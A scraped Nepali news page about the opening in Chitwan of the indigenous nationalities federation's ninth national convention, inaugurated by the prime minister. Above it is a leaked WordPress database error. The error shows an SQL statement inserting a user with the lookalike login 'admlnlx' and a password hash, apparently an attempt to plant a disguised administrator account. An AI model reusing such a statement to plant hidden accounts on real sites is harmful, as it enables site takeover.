WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF8Bl5/R6bsKJ2ZL0yCdc9H52ICAr1/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 17:00:13', '', 'admlnlx', 'admlnlx')
चितवन, पुस २-
नेपाल आदिवासी जनजाति महासंघको नवौं राष्टिय महाधिवेशन आज (शनिबार)देखि चितवनमा सुरु भएको छ । प्रधानमन्त्री पुष्पकमल दाहालले प्रकृतिको पुजा गरि महाधिवेशनको उद्घाटन गर्नुभएको छ ।अहिले उद्घाटन सत्र चलिरहेको छ ।विभिन्न क्षेत्रका अतिथिहरुले सुभकामना मन्तव्य दिनेक्रम जारी छ ।उद्घाटन सत्रअघि नारायणगढस्थिल पुलचोकबाट झांकीसहितको र्या्लि निकालिएको थियो ।महाधिवेशनमा यस पटक २२ वटा विदेश शाखा, ७१ वटा जिल्ला समन्वय परिषद र ६५ वटा महासंघमा आवद्ध जातिय संस्थाबाट ४ सय २२ जना प्रतिनिधि, पर्यवेक्षकहरु महाधिवेशनमा सहभागी भएका छन् ।